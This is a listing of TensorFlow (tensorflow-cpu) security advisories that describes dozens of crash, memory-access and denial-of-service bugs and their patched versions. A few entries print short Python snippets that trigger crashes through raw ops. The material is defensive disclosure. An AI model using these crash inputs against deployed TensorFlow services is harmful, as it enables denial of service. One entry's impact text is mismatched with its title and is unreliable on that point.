Advisories for the PyPI tensorflow-cpu package

2024
2023

TensorFlow Denial of Service vulnerability

Impact: A malicious invalid input crashes a TensorFlow model (Check Failed) and can be used to trigger a denial of service attack. To produce a minimal example of the bug, we built a simple single-layer TensorFlow model containing a Convolution3DTranspose layer, which works well with expected inputs and can be deployed in real-world systems. However, if we call the model with a malicious input which has a zero dimension, it gives a Check Failed failure …
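
For illustration, a minimal sketch of the scenario described above (the layer configuration and tensor shapes are placeholders, not the reporter's exact model):

    import tensorflow as tf

    # Hypothetical single-layer model containing a Conv3DTranspose layer.
    model = tf.keras.Sequential(
        [tf.keras.layers.Conv3DTranspose(filters=2, kernel_size=3, padding="same")])

    ok = tf.zeros([1, 4, 4, 4, 1])    # a well-formed 5-D input behaves as expected
    print(model(ok).shape)

    bad = tf.zeros([1, 4, 0, 4, 1])   # an input with a zero-sized dimension, as in the report
    model(bad)                        # affected versions aborted here with a Check Failed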

Out-of-bounds Write

TensorFlow is an open source platform for machine learning. There is out-of-bounds access due to mismatched integer type sizes. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.

Out-of-bounds Read

TensorFlow is an open source platform for machine learning. Prior to versions 2.12.0 and 2.11.1, if the parameter indices for DynamicStitch does not match the shape of the parameter data, it can trigger a stack OOB read. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.
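
For illustration only, a sketch of the kind of mismatched call described above (shapes are placeholders, not the reporter's proof of concept):

    import tensorflow as tf

    # `indices` describes four positions, but `data` supplies a tensor whose shape
    # does not line up with it; patched versions reject this with an error.
    indices = [tf.constant([0, 1, 2, 3], dtype=tf.int32)]
    data = [tf.constant([[1.0, 2.0]])]
    tf.raw_ops.DynamicStitch(indices=indices, data=data)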

Out-of-bounds Read

TensorFlow is an open source platform for machine learning. Prior to versions 2.12.0 and 2.11.1, there is an out-of-bounds read in GRUBlockCellGrad. A fix is included in TensorFlow 2.12.0 and 2.11.1.

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. Prior to versions 2.12.0 and 2.11.1, when the parameter summarize of tf.raw_ops.Print is zero, the new method SummarizeArray<bool> will dereference a nullptr, leading to a seg fault. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.
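
For illustration, a minimal call with summarize set to zero, the condition described above (the tensor contents are placeholders):

    import tensorflow as tf

    t = tf.constant([True, False, True])
    # summarize=0 is the problematic value; patched versions handle it gracefully.
    tf.raw_ops.Print(input=t, data=[t], message="vals: ", summarize=0)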

NULL Pointer Dereference

TensorFlow is an open source machine learning platform. Versions prior to 2.12.0 and 2.11.1 have a null pointer error in RandomShuffle with XLA enabled. A fix is included in TensorFlow 2.12.0 and 2.11.1.

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. Prior to versions 2.12.0 and 2.11.1, when SparseSparseMaximum is given invalid sparse tensors as inputs, it can give a null pointer error. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. Prior to versions 2.12.0 and 2.11.1, when ctx->step_container() is a null ptr, the Lookup function will be executed with a null pointer. A fix is included in TensorFlow 2.12.0 and 2.11.1.

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. The function tf.raw_ops.LookupTableImportV2 cannot handle scalars in the values parameter and gives an NPE. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.
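
For illustration, a sketch of a call passing a scalar values argument (the table dtypes and keys are placeholders):

    import tensorflow as tf

    table = tf.raw_ops.HashTableV2(key_dtype=tf.int64, value_dtype=tf.int64)
    # `values` is a scalar rather than a vector matching `keys`.
    tf.raw_ops.LookupTableImportV2(table_handle=table,
                                   keys=tf.constant([1], dtype=tf.int64),
                                   values=tf.constant(2, dtype=tf.int64))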

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. Versions prior to 2.12.0 and 2.11.1 have a null pointer error in QuantizedMatMulWithBiasAndDequantize with MKL enabled. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.

NULL Pointer Dereference

TensorFlow is an open source machine learning platform. When running versions prior to 2.12.0 and 2.11.1 with XLA, tf.raw_ops.ParallelConcat segfaults with a nullptr dereference when given a parameter shape with rank that is not greater than zero. A fix is available in TensorFlow 2.12.0 and 2.11.1.

Integer Overflow or Wraparound

TensorFlow is an open source platform for machine learning. Prior to versions 2.12.0 and 2.11.1, integer overflow occurs when 2^31 <= num_frames * height * width * channels < 2^32, for example a Full HD screencast of at least 346 frames. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.
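
As a quick arithmetic check of the stated bound (plain Python, no TensorFlow required):

    # A 1920x1080 RGB ("Full HD") screencast of 346 frames crosses 2^31 elements.
    num_frames, height, width, channels = 346, 1080, 1920, 3
    total = num_frames * height * width * channels
    print(total, 2**31 <= total < 2**32)   # 2152396800 True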

Incorrect Comparison

TensorFlow is an open source platform for machine learning. Prior to versions 2.12.0 and 2.11.1, if the stride and window size are not positive for tf.raw_ops.AvgPoolGrad, it can give a floating point exception. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.
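
For illustration, a sketch of a call with a non-positive window size (all shapes and values are placeholders, not the reporter's proof of concept):

    import tensorflow as tf

    tf.raw_ops.AvgPoolGrad(orig_input_shape=tf.constant([1, 4, 4, 1], dtype=tf.int32),
                           grad=tf.zeros([1, 4, 4, 1]),
                           ksize=[1, 0, 0, 1],      # zero window size, the condition described above
                           strides=[1, 1, 1, 1],
                           padding="SAME")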

Incorrect Comparison

TensorFlow is an open source machine learning platform. When running versions prior to 2.12.0 and 2.11.1 with XLA, tf.raw_ops.Bincount segfaults when given a parameter weights that is neither the same shape as parameter arr nor a length-0 tensor. A fix is included in TensorFlow 2.12.0 and 2.11.1.
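
For illustration, a sketch of the shape mismatch described above under XLA compilation (values are placeholders):

    import tensorflow as tf

    @tf.function(jit_compile=True)
    def f(arr, weights):
        return tf.raw_ops.Bincount(arr=arr, size=4, weights=weights)

    arr = tf.constant([0, 1, 2, 3], dtype=tf.int32)
    weights = tf.constant([1.0, 2.0])   # neither the same shape as arr nor length-0
    f(arr, weights)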

Incorrect Comparison

TensorFlow is an open source platform for machine learning. Versions prior to 2.12.0 and 2.11.1 have a Floating Point Exception in TensorListSplit with XLA. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.

Incorrect Comparison

TensorFlow is an open source platform for machine learning. Prior to versions 2.12.0 and 2.11.1, there is a floating point exception in AudioSpectrogram. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.

Incorrect Comparison

TensorFlow is an end-to-end open source platform for machine learning. Constructing a TFLite model with a parameter filter_input_channel of less than 1 gives an FPE. This issue has been patched in version 2.12. TensorFlow will also cherrypick the fix commit on TensorFlow 2.11.1.

Heap-based Buffer Overflow

TensorFlow is an open source platform for machine learning. Attackers using TensorFlow prior to 2.12.0 or 2.11.1 can access heap memory which is not under the user's control, leading to a crash or remote code execution. The fix is included in TensorFlow version 2.12.0, and the fix commit has also been cherrypicked onto TensorFlow version 2.11.1.

Heap-based Buffer Overflow

TensorFlow is an open source platform for machine learning. Prior to versions 2.12.0 and 2.11.1, there is a heap buffer overflow in TAvgPoolGrad. A fix is included in TensorFlow 2.12.0 and 2.11.1.

Double Free

TensorFlow is an open source machine learning platform. Prior to versions 2.12.0 and 2.11.1, nn_ops.fractional_avg_pool_v2 and nn_ops.fractional_max_pool_v2 require the first and fourth elements of their parameter pooling_ratio to be equal to 1.0, as pooling on batch and channel dimensions is not supported. A fix is included in TensorFlow 2.12.0 and 2.11.1.

2022

Out-of-bounds Read

TensorFlow is an open source platform for machine learning. When the BaseCandidateSamplerOp function receives a value in true_classes larger than range_max, a heap oob read occurs. We have patched the issue in GitHub commit b389f5c944cadfdfe599b3f1e4026e036f30d2d4. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Reachable Assertion

TensorFlow is an open source platform for machine learning. If tf.raw_ops.TensorListResize is given a nonscalar value for input size, it results in a CHECK fail which can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 888e34b49009a4e734c27ab0c43b0b5102682c56. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and …
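
For illustration, a sketch of a call passing a non-scalar size (the tensor list itself is a placeholder):

    import tensorflow as tf

    handle = tf.raw_ops.TensorListReserve(element_shape=[2], num_elements=2,
                                          element_dtype=tf.float32)
    # `size` should be a scalar; a 1-D tensor is the condition described above.
    tf.raw_ops.TensorListResize(input_handle=handle, size=tf.constant([3, 3]))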

Out-of-bounds Write

TensorFlow is an open source platform for machine learning. The vulnerability is in FractionalMaxPool and FractionalAvgPool when given an illegal pooling_ratio. Attackers using TensorFlow can exploit it to access heap memory which is not under the user's control, leading to a crash or remote code execution. We have patched the issue in GitHub commit 216525144ee7c910296f5b05d214ca1327c9ce48. The fix will be included in TensorFlow 2.11.0. We will also cherrypick this commit …

Out-of-bounds Read

TensorFlow is an open source platform for machine learning. If MirrorPadGrad is given oversized input paddings, TensorFlow will give a heap OOB error. We have patched the issue in GitHub commit 717ca98d8c3bba348ff62281fdf38dcb5ea1ec92. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Out-of-bounds Read

TensorFlow is an open source platform for machine learning. When ops that have specified input sizes receive a differing number of inputs, the executor will crash. We have patched the issue in GitHub commit f5381e0e10b5a61344109c1b7c174c68110f7629. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Out-of-bounds Read

TensorFlow is an open source platform for machine learning. If FractionalMaxPoolGrad is given oversized inputs row_pooling_sequence and col_pooling_sequence, TensorFlow will crash. We have patched the issue in GitHub commit d71090c3e5ca325bdf4b02eb236cfb3ee823e927. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Out of bounds write in grappler in Tensorflow

Impact: The function MakeGrapplerFunctionItem takes arguments that determine the sizes of inputs and outputs. If the inputs given are greater than or equal to the sizes of the outputs, an out-of-bounds memory read or a crash is triggered. Patches: We have patched the issue in GitHub commit a65411a1d69edfb16b25907ffb8f73556ce36bb7. The fix will be included in TensorFlow 2.11.0. We will also cherrypick this commit on TensorFlow 2.10.1. For more information, please …

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. If a list of quantized tensors is assigned to an attribute, the pywrap code fails to parse the tensor and returns a nullptr, which is not caught. An example can be seen in tf.compat.v1.extract_volume_patches by passing in quantized tensors as input ksizes. We have patched the issue in GitHub commit e9e95553e5411834d215e6770c81a83a3d0866ce. The fix will be included in TensorFlow 2.11. We will …

Incorrect Type Conversion or Cast

TensorFlow is an open source platform for machine learning. When printing a tensor, we get its data as a const char* array (since that's the underlying storage) and then we typecast it to the element type. However, conversions from char to bool are undefined if the char is not 0 or 1, so sanitizers/fuzzers will crash. The issue has been patched in GitHub commit 1be74370327. The fix will be included …

Incorrect Type Conversion or Cast

TensorFlow is an open source platform for machine learning. If BCast::ToShape is given input larger than an int32, it will crash, despite being supposed to handle up to an int64. An example can be seen in tf.experimental.numpy.outer by passing in large input to the input b. We have patched the issue in GitHub commit 8310bf8dd188ff780e7fc53245058215a05bdbe5. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on …

Incorrect Calculation of Buffer Size

TensorFlow is an open source platform for machine learning. When tf.raw_ops.ResizeNearestNeighborGrad is given a large size input, it overflows. We have patched the issue in GitHub commit 00c821af032ba9e5f5fa3fe14690c8d28a657624. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.
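
For illustration, a sketch of a call with an oversized size argument (the gradient tensor is a placeholder, not the reporter's proof of concept):

    import tensorflow as tf

    tf.raw_ops.ResizeNearestNeighborGrad(grads=tf.zeros([1, 2, 2, 1]),
                                         size=tf.constant([0x7FFFFFFF, 0x7FFFFFFF],
                                                          dtype=tf.int32))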

Incorrect Calculation of Buffer Size

TensorFlow is an open source platform for machine learning. When tf.raw_ops.ImageProjectiveTransformV2 is given a large output shape, it overflows. We have patched the issue in GitHub commit 8faa6ea692985dbe6ce10e1a3168e0bd60a723ba. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Incorrect Calculation of Buffer Size

TensorFlow is an open source platform for machine learning. tf.keras.losses.poisson receives a y_pred and y_true that are passed through functor::mul in BinaryOp. If the resulting dimensions overflow an int32, TensorFlow will crash due to a size mismatch during broadcast assignment. We have patched the issue in GitHub commit c5b30379ba87cbe774b08ac50c1f6d36df4ebb7c. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1 and 2.9.3, as these …

Incorrect Calculation of Buffer Size

TensorFlow is an open source platform for machine learning. When tf.raw_ops.FusedResizeAndPadConv2D is given a large tensor shape, it overflows. We have patched the issue in GitHub commit d66e1d568275e6a2947de97dca7a102a211e01ce. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Improper Input Validation

TensorFlow is an open source platform for machine learning. If ThreadUnsafeUnigramCandidateSampler is given input filterbank_channel_count greater than the allowed max size, TensorFlow will crash. We have patched the issue in GitHub commit 39ec7eaf1428e90c37787e5b3fbd68ebd3c48860. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Improper Input Validation

TensorFlow is an open source platform for machine learning. An input encoded that is not a valid CompositeTensorVariant tensor will trigger a segfault in tf.raw_ops.CompositeTensorVariantToComponents. We have patched the issue in GitHub commits bf594d08d377dc6a3354d9fdb494b32d45f91971 and 660ce5a89eb6766834bdc303d2ab3902aef99d3d. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Improper Input Validation

TensorFlow is an open source platform for machine learning. Inputs dense_features or example_state_data not of rank 2 will trigger a CHECK fail in SdcaOptimizer. We have patched the issue in GitHub commit 80ff197d03db2a70c6a111f97dcdacad1b0babfa. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Improper Input Validation

TensorFlow is an open source platform for machine learning. An input token that is not a UTF-8 bytestring will trigger a CHECK fail in tf.raw_ops.PyFunc. We have patched the issue in GitHub commit 9f03a9d3bafe902c1e6beb105b2f24172f238645. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Improper Input Validation

TensorFlow is an open source platform for machine learning. If tf.raw_ops.TensorListConcat is given element_shape=[], it results in a segmentation fault which can be used to trigger a denial of service attack. We have patched the issue in GitHub commit fc33f3dc4c14051a83eec6535b608abe1d355fde. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Improper Input Validation

TensorFlow is an open source platform for machine learning. If SparseFillEmptyRowsGrad is given empty inputs, TensorFlow will crash. We have patched the issue in GitHub commit af4a6a3c8b95022c351edae94560acc61253a1b8. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Improper Input Validation

TensorFlow is an open source platform for machine learning. An input sparse_matrix that is not a matrix with a shape with rank 0 will trigger a CHECK fail in tf.raw_ops.SparseMatrixNNZ. We have patched the issue in GitHub commit f856d02e5322821aad155dad9b3acab1e9f5d693. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Improper Input Validation

TensorFlow is an open source platform for machine learning. When running on GPU, tf.image.generate_bounding_box_proposals receives a scores input that must be of rank 4 but is not checked. We have patched the issue in GitHub commit cf35502463a88ca7185a99daa7031df60b3c1c98. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Heap overflow in `QuantizeAndDequantizeV2`

Impact: The function MakeGrapplerFunctionItem takes arguments that determine the sizes of inputs and outputs. If the inputs given are greater than or equal to the sizes of the outputs, an out-of-bounds memory read or a crash is triggered.

    import tensorflow as tf

    @tf.function
    def test():
        tf.raw_ops.QuantizeAndDequantizeV2(input=[2.5], input_min=[1.0], input_max=[10.0],
                                           signed_input=True, num_bits=1, range_given=True,
                                           round_mode='HALF_TO_EVEN', narrow_range=True,
                                           axis=0x7fffffff)

    test()

Patches: We have patched the issue in GitHub commit 7b174a0f2e40ff3f3aa957aecddfd5aaae35eccb. The fix will be …

Always-Incorrect Control Flow Implementation

TensorFlow is an open source platform for machine learning. If a numpy array is created with a shape such that one element is zero and the others sum to a large number, an error will be raised. We have patched the issue in GitHub commit 2b56169c16e375c521a3bc8ea658811cc0793784. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are …

`CHECK` failure in `SobolSample` via missing validation

Impact: Another instance of CVE-2022-35935, where SobolSample is vulnerable to a denial of service via assumed scalar inputs, was found and fixed.

    import tensorflow as tf

    tf.raw_ops.SobolSample(dim=tf.constant([1, 0]),
                           num_results=tf.constant([1]),
                           skip=tf.constant([1]))

Patches: We have patched the issue in GitHub commits c65c67f88ad770662e8f191269a907bf2b94b1bf and 02400ea266bd811fc016a848445de1bbff3a23a0. The fix will be included in TensorFlow 2.11. We will also cherrypick both commits on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in …

`CHECK` fail in `TensorListScatter` and `TensorListScatterV2` in eager mode

Impact: Another instance of CVE-2022-35991, where TensorListScatter and TensorListScatterV2 crash via non-scalar inputs in element_shape, was found in eager mode and fixed.

    import tensorflow as tf

    arg_0 = tf.random.uniform(shape=(2, 2, 2), dtype=tf.float16, maxval=None)
    arg_1 = tf.random.uniform(shape=(2, 2, 2), dtype=tf.int32, maxval=65536)
    arg_2 = tf.random.uniform(shape=(2, 2, 2), dtype=tf.int32, maxval=65536)
    arg_3 = ''
    tf.raw_ops.TensorListScatter(tensor=arg_0, indices=arg_1,
                                 element_shape=arg_2, name=arg_3)

Patches: We have patched the issue in GitHub commit bf9932fc907aff0e9e8cccf769e8b00d30fd81a1. The fix will be included in TensorFlow 2.11. We will also cherrypick this …

TensorFlow vulnerable to heap out of bounds read in filesystem glob matching

The general implementation for matching filesystem paths to a globbing pattern is vulnerable to an access out of bounds of the array holding the directories:

    if (!fs->Match(child_path, dirs[dir_index])) { … }

Since dir_index is unconditionally incremented outside of the lambda function where the vulnerable pattern occurs, this results in an out-of-bounds access under certain scenarios. For example, if /tmp/x is a directory that only contains a single file …

TensorFlow vulnerable to null dereference on MLIR on empty function attributes

TensorFlow is an open source platform for machine learning. When mlir::tfg::ConvertGenericFunctionToFunctionDef is given empty function attributes, it gives a null dereference. We have patched the issue in GitHub commit aed36912609fc07229b4d0a7b44f3f48efc00fd0. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.

TensorFlow vulnerable to assertion fail on MLIR empty edge names

TensorFlow is an open source platform for machine learning. When mlir::tfg::ConvertGenericFunctionToFunctionDef is given empty function attributes, it crashes. We have patched the issue in GitHub commit ad069af92392efee1418c48ff561fd3070a03d7b. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.

TensorFlow vulnerable to `CHECK` failures in `UnbatchGradOp`

TensorFlow is an open source platform for machine learning. The UnbatchGradOp function takes an argument id that is assumed to be a scalar. A nonscalar id can trigger a CHECK failure and crash the program. It also requires its argument batch_index to contain three times the number of elements as indicated in its batch_index.dim_size(0). An incorrect batch_index can trigger a CHECK failure and crash the program. We have patched the …

TensorFlow vulnerable to `CHECK` failure in tf.reshape via overflows

TensorFlow is an open source platform for machine learning. The implementation of tf.reshape op in TensorFlow is vulnerable to a denial of service via CHECK-failure (assertion failure) caused by overflowing the number of elements in a tensor. This issue has been patched in GitHub commit 61f0f9b94df8c0411f0ad0ecc2fec2d3f3c33555. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these …

TensorFlow vulnerable to `CHECK` fail in `RaggedTensorToVariant`

TensorFlow is an open source platform for machine learning. If RaggedTensorToVariant is given a rt_nested_splits list that contains tensors of ranks other than one, it results in a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 88f93dfe691563baa4ae1e80ccde2d5c7a143821. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and …

TensorFlow vulnerable to `CHECK` fail in `Conv2DBackpropInput`

TensorFlow is an open source platform for machine learning. The implementation of Conv2DBackpropInput requires input_sizes to be 4-dimensional. Otherwise, it gives a CHECK failure which can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 50156d547b9a1da0144d7babe665cf690305b33c. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When TensorListScatter and TensorListScatterV2 receive an element_shape of a rank greater than one, they give a CHECK fail that can trigger a denial of service attack. We have patched the issue in GitHub commit bb03fdf4aae944ab2e4b35c7daa051068a8b7f61. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also …

Reachable Assertion

TensorFlow is an open source platform for machine learning. If QuantizeAndDequantizeV3 is given a nonscalar num_bits input tensor, it results in a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit f3f9cb38ecfe5a8a703f2c4a8fead434ef291713. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also …

Reachable Assertion

TensorFlow is an open source platform for machine learning. ParameterizedTruncatedNormal assumes shape is of type int32. A valid shape of type int64 results in a mismatched type CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 72180be03447a10810edca700cbc9af690dfeb51. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow …
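
For illustration, a sketch of a call passing an int64 shape, the condition described above (the distribution parameters are placeholders):

    import tensorflow as tf

    tf.raw_ops.ParameterizedTruncatedNormal(shape=tf.constant([2, 2], dtype=tf.int64),
                                            means=tf.constant(0.0),
                                            stdevs=tf.constant(1.0),
                                            minvals=tf.constant(-1.0),
                                            maxvals=tf.constant(1.0))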

Reachable Assertion

TensorFlow is an open source platform for machine learning. When tf.quantization.fake_quant_with_min_max_vars_gradient receives input min or max that is nonscalar, it gives a CHECK fail that can trigger a denial of service attack. We have patched the issue in GitHub commit f3cf67ac5705f4f04721d15e485e192bb319feed. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When DrawBoundingBoxes receives an input boxes that is not of dtype float, it gives a CHECK fail that can trigger a denial of service attack. We have patched the issue in GitHub commit da0d65cdc1270038e72157ba35bf74b85d9bda11. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected …

Reachable Assertion

TensorFlow is an open source platform for machine learning. The implementation of AvgPoolGrad does not fully validate the input orig_input_shape. This results in a CHECK failure which can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 3a6ac52664c6c095aa2b114e742b0aa17fdce78f. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When MaxPool receives a window size input array ksize with dimensions greater than its input tensor input, the GPU kernel gives a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 32d7bd3defd134f21a4e344c8dfd40099aaf6b18. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When tensorflow::full_type::SubstituteFromAttrs receives a FullTypeDef& t that does not have exactly three args, it triggers a CHECK-fail instead of returning a status. We have patched the issue in GitHub commit 6104f0d4091c260ce9352f9155f7e9b725eab012. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When tf.quantization.fake_quant_with_min_max_vars_per_channel_gradient receives input min or max of rank other than 1, it gives a CHECK fail that can trigger a denial of service attack. We have patched the issue in GitHub commit f3cf67ac5705f4f04721d15e485e192bb319feed. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When CollectiveGather receives a scalar input input, it gives a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit c1f491817dec39a26be3c574e86a88c30f3c4770. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When tf.random.gamma receives large input shape and rates, it gives a CHECK fail that can trigger a denial of service attack. We have patched the issue in GitHub commit 552bfced6ce4809db5f3ca305f60ff80dd40c5a3. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When SetSize receives an input set_shape that is not a 1D tensor, it gives a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit cf70b79d2662c0d3c6af74583641e345fc939467. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When RandomPoissonV2 receives large input shape and rates, it gives a CHECK fail that can trigger a denial of service attack. We have patched the issue in GitHub commit 552bfced6ce4809db5f3ca305f60ff80dd40c5a3. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported …

Reachable Assertion

TensorFlow is an open source platform for machine learning. In core/kernels/list_kernels.cc's TensorListReserve, num_elements is assumed to be a tensor of size 1. When a num_elements of more than 1 element is provided, then tf.raw_ops.TensorListReserve fails the CHECK_EQ in CheckIsAlignedAndSingleElement. We have patched the issue in GitHub commit b5f6fbfba76576202b72119897561e3bd4f179c7. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When AudioSummaryV2 receives an input sample_rate with more than one element, it gives a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit bf6b45244992e2ee543c258e519489659c99fb7f. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are …

Reachable Assertion

TensorFlow is an open source platform for machine learning. The implementation of AvgPool3DGradOp does not fully validate the input orig_input_shape. This results in an overflow that leads to a CHECK failure which can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 9178ac9d6389bdc54638ab913ea0e419234d14eb. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, …

Reachable Assertion

TensorFlow is an open source platform for machine learning. FractionalMaxPoolGrad validates its inputs with CHECK failures instead of with returning errors. If it gets incorrectly sized inputs, the CHECK failure can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 8741e57d163a079db05a7107a7609af70931def4. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When tf.linalg.matrix_rank receives an empty input a, the GPU kernel gives a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit c55b476aa0e0bd4ee99d0f3ad18d9d706cd1260a. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected …

Reachable Assertion

